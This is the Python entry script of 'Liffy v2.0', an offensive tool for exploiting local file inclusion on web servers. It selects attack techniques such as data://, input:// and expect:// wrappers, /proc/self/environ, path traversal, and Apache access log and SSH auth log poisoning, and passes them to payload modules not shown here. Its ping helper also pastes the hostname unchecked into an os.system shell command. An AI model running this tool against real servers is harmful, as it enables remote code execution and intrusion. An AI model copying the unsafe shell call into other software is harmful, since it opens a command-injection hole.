liffy.py

#!/usr/bin/python

import argparse
import os
import signal
import sys
import urllib.parse

from pyfiglet import figlet_format

from core import Expect, Filter, Input, accesslog, data, proc, sshlog
from core.utils import colors


def ping(hostname):
    """Ping the host to check if it's up or down

    Arguments:
        hostname {str} -- hostname to ping

    Returns:
        bool -- Tell if host is up or not
    """
    resp = os.system("ping -c 1 -W2 "+hostname+" > /dev/null 2>&1")

    if resp == 0:
        return True
    else:
        return False


def signal_handler(signal, frame):
    print(colors('\n\nYou pressed Ctrl+C!', 91))
    sys.exit(0)


def main():
    if not len(sys.argv):
        print("[!] Not Enough Arguments!")
        # TODO: Add usage
        sys.exit(0)

    parser = argparse.ArgumentParser()
    parser.add_argument("url", help="URL to test for LFI")
    parser.add_argument("-d", "--data", help="Use data:// technique", action="store_true")
    parser.add_argument("-i", "--input", help="Use input:// technique", action="store_true")
    parser.add_argument("-e", "--expect", help="Use expect:// technique", action="store_true")
    parser.add_argument("-f", "--filter", help="Use filter:// technique", action="store_true")
    parser.add_argument("-p", "--proc", help="Use /proc/self/environ technique", action="store_true")
    parser.add_argument("-a", "--access", help="Apache access logs technique", action="store_true")
    parser.add_argument("-ns", "--nostager", help="execute payload directly, do not use stager", action="store_true")
    parser.add_argument("-r", "--relative", help="use path traversal sequences for attack", action="store_true")
    parser.add_argument("--ssh", help="SSH auth log poisoning", action="store_true")
    parser.add_argument("-l", "--location", help="path to target file (access log, auth log, etc.)")
    parser.add_argument("--cookies", help="session cookies for authentication")

    args = parser.parse_args()

    url = args.url
    nostager = args.nostager
    relative = args.relative
    cookies = args.cookies

    parsed = urllib.parse.urlsplit(url)

    print(colors("[~] Checking Target: {0}".format(parsed.netloc), 93))

    # if ping(parsed.netloc):
    #     print(colors("[+] Target looks alive ", 92))
    # else:
    #     print(colors("[!] Target irresponsive ", 91))
    #     sys.exit(1)

    if not parsed.query:
        print(colors("[!] No GET parameter Provided ", 91))

    # TODO: Find a better way to do these checks
    if args.data:
        print(colors("[~] Testing with data:// ", 93))
        d = data.Data(url, nostager, cookies)
        d.execute_data()
    elif args.input:
        print(colors("[~] Testing with input:// ", 93))
        i = Input.Input(url, nostager, cookies)
        i.execute_input()
    elif args.expect:
        print(colors("[~] Testing with expect:// ", 93))
        e = Expect.Expect(url, nostager, cookies)
        e.execute_expect()
    elif args.proc:
        print(colors("[~] /proc/self/environ Technique Selected!", 93))
        i = proc.Environ(url, nostager, relative, cookies)
        i.execute_environ()
    elif args.access:
        print(colors("[~] Testing for Apache access.log poisoning", 93))
        if not args.location:
            print(colors("[~] Log Location Not Provided! Using Default", 93))
            l = '/var/log/apache2/access.log'
        else:
            l = args.location
        a = accesslog(url, l, nostager, relative, cookies)
        a.execute_logs()
    elif args.ssh:
        print(colors("[~] Testing for SSH log poisoning ", 93))
        if not args.location:
            print(colors("[~] Log Location Not Provided! Using Default", 93))
            l = '/var/log/auth.log'
        else:
            l = args.location
        a = sshlog.SSHLogs(url, l, relative, cookies)
        a.execute_ssh()
    elif args.filter:
        print(colors("[~] Testing with expect://", 93))
        f = Filter.Filter(url, cookies)
        f.execute_filter()
    else:
        print(colors("[!] Please select atleast one technique to test", 91))
        sys.exit(0)


if __name__ == "__main__":
    signal.signal(signal.SIGINT, signal_handler)
    print(colors(figlet_format('Liffy v2.0', font='big'), 92))
    print("\n")
    main()